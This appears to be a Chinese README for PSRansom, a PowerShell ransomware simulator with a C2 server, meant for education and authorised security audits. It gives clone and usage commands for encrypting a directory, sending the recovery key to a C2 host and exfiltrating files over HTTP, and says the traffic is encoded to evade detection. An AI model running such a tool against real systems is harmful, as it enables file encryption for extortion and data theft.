
PSRansom 是一个具备C2服务器功能的PowerShell勒索软件模拟器。该工具可帮助您在安装了PowerShell的任何系统上模拟通用勒索软件的加密过程。借助集成的C2服务器,您可以通过HTTP外泄文件并接收客户端信息。
两个组件之间的所有通信均经过加密或编码,以避开流量检测机制,尽管始终未使用HTTPS。
建议克隆完整仓库或下载zip压缩包。 您可以通过运行以下命令来完成:
git clone https://github.com/JoelGMSec/PSRansom
.\PSRansom -h
____ ____ ____
| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
Info: 此工具可帮助您模拟通用勒索软件在PowerShell中的加密过程,
同时具备C2功能。
Usage: .\PSRansom.ps1 -e Directory -s C2Server -p C2Port
加密所有文件并将恢复密钥发送到C2Server
使用 -x 在外泄和解密文件时与C2Server交互
.\PSRansom.ps1 -d Directory -k RecoveryKey
使用恢复密钥字符串解密所有文件
Warning: 所有信息将未经加密发送到C2Server
您需要事先生成恢复密钥才能恢复文件
https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell
本项目基于GNU 3.0许可协议 - 更多详情请参阅LICENSE文件。
该工具由Joel Gámez Molina // @JoelGMSec 从头创建并设计。
本软件不提供任何形式的担保。其使用仅限于教育环境或在客户相应同意下的安全审计。我不对其滥用或由此造成的任何可能的损害负责。
更多信息,您可以在Twitter上找到我 @JoelGMSec,以及在我的博客 darkbyte.net。
您可以通过请我喝咖啡来支持我的工作: